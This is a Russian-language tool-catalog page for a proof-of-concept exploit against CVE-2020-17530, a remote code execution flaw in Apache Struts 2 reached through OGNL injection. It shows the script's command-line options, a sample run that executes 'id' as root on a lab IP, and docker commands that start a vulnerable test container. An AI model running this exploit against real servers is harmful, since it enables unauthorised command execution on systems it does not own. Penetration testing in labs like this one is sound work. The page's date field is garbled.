Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-17530 — Эксплойт для проверки концепции для CVE-2020-17530, уязвимости удаленного выполнения кода в Apache Struts 2 через OGNL-инъекцию. Включает Python-скрипт для атаки на уязвимые экземпляры Struts. | Kitploit
Инструменты/GitHubGitHub/cyborgsecurity/cve-2020-17530
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingArchived
GitHubcyborgsecurity/cve-2020-17530

CVE-2020-17530

Эксплойт для проверки концепции для CVE-2020-17530, уязвимости удаленного выполнения кода в Apache Struts 2 через OGNL-инъекцию. Включает Python-скрипт для атаки на уязвимые экземпляры Struts.

Репозиторий
4325 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-17530

Быстрое POC для CVE-2020-17530. В Apache Struts версий 2.0.0 - 2.5.25 принудительное вычисление Object Graph Navigational Language (OGNL) на необработанных пользовательских входных данных в атрибутах тегов может привести к удаленному выполнению кода (RCE).

root@kitploit:~
$ python CVE-2020-17530.py --help
usage: CVE-2020-17530.py [-h] [-c COMMAND] [-n NAME] [-p PORT] [-t TARGET] [-u URI]

optional arguments:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        command
  -n NAME, --name NAME  form data name
  -p PORT, --port PORT  port
  -t TARGET, --target TARGET
                        target
  -u URI, --uri URI     uri

$ python CVE-2020-17530.py --target 10.10.30.62 --port 8080 --uri "/index.action" --command id
uid=0(root) gid=0(root) groups=0(root)

Установка

root@kitploit:~
$ docker pull vulhub/struts2:2.5.25
$ docker run -d -p 8080:8080 vulhub/struts2:2.5.25
Скачать инструмент